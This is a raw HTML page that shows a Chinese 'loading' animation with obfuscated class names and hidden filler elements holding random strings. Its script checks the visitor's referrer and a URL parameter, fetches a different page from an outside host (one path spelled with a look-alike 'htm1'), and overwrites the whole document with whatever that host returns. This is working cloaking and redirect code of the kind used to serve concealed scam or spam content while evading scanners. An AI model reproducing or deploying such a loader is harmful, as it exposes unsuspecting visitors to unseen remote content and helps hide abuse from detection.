<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .FcYuHr0Vkzc {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .FcYuHr0Vkzc .w6A2bCBIiSg {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .FcYuHr0Vkzc .content {
            line-height: 50px;
            text-align: center
        }

        .FcYuHr0Vkzc .img {
            width: 100%
        }

        .FcYuHr0Vkzc .mCNDKtmc {
            text-align: center
        }

        .FcYuHr0Vkzc .mCNDKtmc span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .FcYuHr0Vkzc .mCNDKtmc span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .FcYuHr0Vkzc .mCNDKtmc span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .FcYuHr0Vkzc .mCNDKtmc span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .FcYuHr0Vkzc .mCNDKtmc span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .FcYuHr0Vkzc .mCNDKtmc span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .FcYuHr0Vkzc .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function TXVrQui8mG1(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var KY4v3v = TXVrQui8mG1('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ KY4v3v +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ KY4v3v +".html?a=share";
		}
		
        J7Wv6s=url+"#"+new Date().getTime();
        J7Wv6s && function() {
            $.get(J7Wv6s, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>X6wrbbXZpcaTLraIH9yXC50t52rDUQIZEghUdFO2WqhMqw88AWYNcyRVE5Fyu992</div>
<div style='display:none'>X6wrbbXZpcaTLraIH9yXC50t52rDUQIZEghUdFO2WqhMqw88AWYNcyRVE5Fyu992</div>
<span style='display:none'>naNYEaZsPJ0qqN2pOxcm3ck0aRKimuBgpgnOPNaQgFeJ9tGzh68G3hSPfyzIB6rR2j0Boy7WOUiuzXw6HyzAXwIwU2bnSyH2n</span><div class="FcYuHr0Vkzc">
    <div class="w6A2bCBIiSg">
        <div class="mCNDKtmc">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >O9G3WuBC7zIkO9</b>
<b style='display:none' >O9G3WuBC7zIkO9</b>
<a  href='#' style='display:none'>xl9KxF3HIDCKwD6tR07H2IlG7RefWcGjqhjqMfToSOZNABtl</a>
<span style='display:none'>onTII7arV7G0xabsAP0uLFqfPQNte05AFBgT8qyqno2VlJMgd4zOjsphDGHTL4Pp3rqzUpFW09BwLdf7iSkOPVKGmO</span>
<img  src='' style='display:none'>
<div style='display:none'>dlcrnnawgQaFd</div>
<div style='display:none'>dlcrnnawgQaFd</div>
<ul style='display:none' >tc1amyOrg58l</ul>
<b style='display:none' >O9G3WuBC7zIkO9</b></body>
</html>